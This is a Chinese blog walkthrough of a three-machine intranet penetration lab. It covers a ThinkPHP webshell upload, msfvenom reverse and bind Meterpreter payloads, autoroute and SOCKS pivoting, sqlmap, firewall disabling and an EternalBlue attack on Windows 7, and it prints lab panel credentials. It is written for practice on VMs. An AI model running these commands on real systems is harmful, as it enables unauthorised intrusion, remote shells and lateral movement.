cfs三层靶机——内网渗透

ops/2024/9/23 10:14:18/

目录

1、环境地址

2、安装教程

3、配置虚拟机网卡

4、网络拓扑

5、安装宝塔

6、渗透测试

7、CentOS7

8、ubuntu

1、生成木马并上传

2、在kali上开启监听

3、回到蚁剑,运行木马

4、制作跳板

1、添加路由

2、查看路由

3、配置代理

4、配置kali的代理,新打开一个终端

5、进行主机扫描与端口扫描

6、给kali的浏览器配置代理

5、访问web页面

6、用dirsearch来探测敏感目录

7、sql注入

8、写入一句话木马

9、新打开一个蚁剑,设置代理

10、拿到ubuntu的webshell

11、制作跳板

9、windows7


1、环境地址

Ubuntu:原版软件 (itellyouhttps://next.itellyou.cn/Original/#cbp=Product?ID=deb4715d-5e52-ea11-bd34-b025aa28351d.cn)

CentOS7:centos-7-isos-x86_64安装包下载_开源镜像站-阿里云 (aliyun.com)

win7:MSDN, 我告诉你 - 做一个安静的工具站 (itellyou.cn)

2、安装教程

CentOS7:超详细的CentOS7的下载安装配置教程_centos7下载-CSDN博客

Ubuntu:Ubuntu 24.04 Server安装流程-CSDN博客

3、配置虚拟机网卡

设置虚拟机网卡(新建两个仅主机模式的网卡)

VMnet9: 子网IP:192.168.22.0 子网掩码:255.255.255.0

VMnet10: 子网IP:192.168.33.0 子网掩码:255.255.255.0

三个虚拟机的网卡配置

虚拟机网卡IP显示

CentOS7

Ubuntu

Windows7

4、网络拓扑

5、安装宝塔

centos7

url=https://download.bt.cn/install/install_lts.sh;if [ -f /usr/bin/curl ];then curl -sSO $url;else wget -O install_lts.sh $url;fi;bash install_lts.sh ed8484bec

https://192.168.220.135:28464/

oz0nkb5d

3abd49f2

ubuntu

wget -O install.sh https://download.bt.cn/install/install_lts.sh && sudo bash install.sh ed8484bec

https://192.168.22.131:22929/

0owrn5te

00df1bf8

6、渗透测试

给定域名

CentOS7 http://192.168.220.135/public/

Ubuntu http://192.168.22.131/upload/

7、CentOS7

1、用nmap扫描ip,看到80端口开放

nmap 192.168.220.135

2、访问web页面

3、看到明显的thinkphp框架,直接用历史漏洞poc干

4、打开我们的脚本

输入目标url,点击检测,发现thinkphp的版本,这里直接上传木马

5、直接用webshell工具连接

如果执行命令时,出现ret=127,是因为php禁用执行命令的函数,打开php的配置文件,

例如:vim /www/server/php/56/etc/php.ini ,这里用自己网站的php版本

查找disable_functions,删除里面的函数

重启php

进行基础的查询

可以看到这台centos7有两张网卡

8、ubuntu

1、生成木马并上传

1、蚁剑当跳板比较麻烦,所以用kali的msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.220.128 LPORT=6666 -f elf > shell.elf 

ip换成自己kali的ip

2、生成的木马在当前路径下,然后打开蚁剑,上传文件,选择刚才生成的木马,

在蚁剑的终端查看:

ls

增加执行权限:

chmod a+x shell.elf

2、在kali上开启监听

1.进入msf:

msfconsole

2.进入监听模块

use exploit/multi/handler

3.设置payload,极其参数

set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.220.128
set lport 6666

4.运行

run

3、回到蚁剑,运行木马
./shell.elf

回到kali,看到已经反弹回来了

查看当前用户

getuid

查看网段

ifconfig

看到还有22这个网段

因为不在同一网段,kali不能连接到,所以把这个靶机当做跳板来渗透

4、制作跳板
1、添加路由

添加去往22段的路由

run autoroute -s 192.168.22.0/24

2、查看路由
run autoroute -p

这时候就伪造好了

使用background命令将meterpreter终端隐藏在后台

background
3、配置代理

配置代理,并设置参数

use auxiliary/server/socks_proxy
set srvport 2222
run

4、配置kali的代理,新打开一个终端
vi /etc/proxychains4.conf
socks5 192.168.220.128 2222

保存退出

Esc   :wq
5、进行主机扫描与端口扫描
proxychains4 nmap -Pn -sT 192.168.22.0/24
扫描到存活主机后,对指定ip扫端口
proxychains4 nmap 192.168.22.131

用代理进行nmap扫描的时候要禁ping扫描,因为ping不能用代理

6、给kali的浏览器配置代理

打开浏览器,可以用插件,也可以用浏览器自带的

拉到最下面选择


5、访问web页面

6、用dirsearch来探测敏感目录

找到robots.txt目录,进去看看

找到后台目录,可以试试爆破

7、sql注入

使用sqlmap跑,跑出账号密码,登录后台

8、写入一句话木马

9、新打开一个蚁剑,设置代理


10、拿到ubuntu的webshell

11、制作跳板
proxychains4 msfconsole

开启监听

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.131
set lport 5555
run

因为他不出网,只能我们去连接他,所以要生成一个正向连接的木马

生成一个正向连接木马,在当前目录下

msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf >test.elf

上传木马,并运行

chmod a+x test.elf
​
./test.elf

关闭ubuntu的防火墙

ufw disable

挂路由

run autoroute -s 192.168.22.0/24
background

切换proxychains4 的代理

use auxiliary/server/socks_proxy
set srvport 3333
run
vi /etc/proxychains4.conf
socks5 192.168.220.128 3333

9、windows7

永恒之蓝,开打,教程之前的博客有,只是在开启msf的时候要用代理,设置payload的时候,要用正向连接,因为win7不出网。

proxychains4 msfconsole
search ms17_010
use 0
set rhost 192.168.33.129
set payload windows/x64/meterpreter/bind_tcp
run


http://www.ppmy.cn/ops/110761.html

相关文章

【Hot100】LeetCode—139. 单词拆分

目录 1- 思路题目识别完全背包-动规五部曲 2- 实现⭐单词拆分——题解思路 3- ACM 实现 原题链接:139. 单词拆分 1- 思路 题目识别 识别1 :字符串 和一个 字符串数组 判断识别2:判断字符串能不能由字符串数组拼接形成,返回 true…

matlab实现数组数据的交换和反转

简介: 给定一个数组,实现数据的交换和反转操作,这两个操作适用于群智能算法的策略。 1)数据的交换操作 代码如下所示: % 实现数组中两个随机数据的交换 arr x_memory; % 生成两个不重复的随机数 idx randperm(le…

网络安全 DVWA通关指南 DVWA Reflected Cross Site Scripting (反射型 XSS)

DVWA Reflected Cross Site Scripting (反射型 XSS) 文章目录 DVWA Reflected Cross Site Scripting (反射型 XSS)XSS跨站原理反射型 LowMediumHighImpossible 参考文献 WEB 安全靶场通关指南 XSS跨站原理 当应用程序发送给浏览器的页面中包含用户提交的数据,但没有…

数据的二进制形式

研究数据的二进制形式可深入理解计算机如何存储数据,以此可以优化、改进甚至创造新的存储方法。 整数 有符号数和无符号数看起来是两种数,其实计算机根本不知道它们的区别。CPU只知道二进制位,你说当有符号数那就是有符号数,你说…

蚂蚁数科,独行的170天和未来新征程

文|白鸽 编|王一粟 9月5日,是赵闻飙上任蚂蚁数科公司首任CEO的第170天,也是蚂蚁数科独立运营的第170天。 在此期间,赵闻飙和蚂蚁数科都经历了角色上的转变。 “接手蚂蚁数科的170天里,我一直在思考一个…

Git学习尚硅谷(005 idea集成git)

尚硅谷Git入门到精通全套教程(涵盖GitHub\Gitee码云\GitLab) 总时长 4:52:00 共45P 此文章包含第27p-第p32的内容 文章目录 忽略特定文件在家目录里创建这个文件在.gitconfig文件里配置这个文件 配置IDEA定位到git程序进行添加文件初始化本地库添加单个…

单片机学习笔记

一、单片机帝国的诞生与发展 1.1 单片机的基本概念 单片机是一种集成电路芯片,采用超大规模的集成电路把具有数据处理功能的中央处理器存储器、输入输出端口、外围电路和相关外设集成在一块硅片上构成一个小而完整的微型计算机系统。 一般而言,单片机也…

探索数据可视化的奥秘:Seaborn库的魔力

文章目录 探索数据可视化的奥秘:Seaborn库的魔力背景:为何选择Seaborn?Seaborn是什么?如何安装Seaborn?简单函数介绍与示例场景应用示例常见问题与解决方案总结 探索数据可视化的奥秘:Seaborn库的魔力 背景…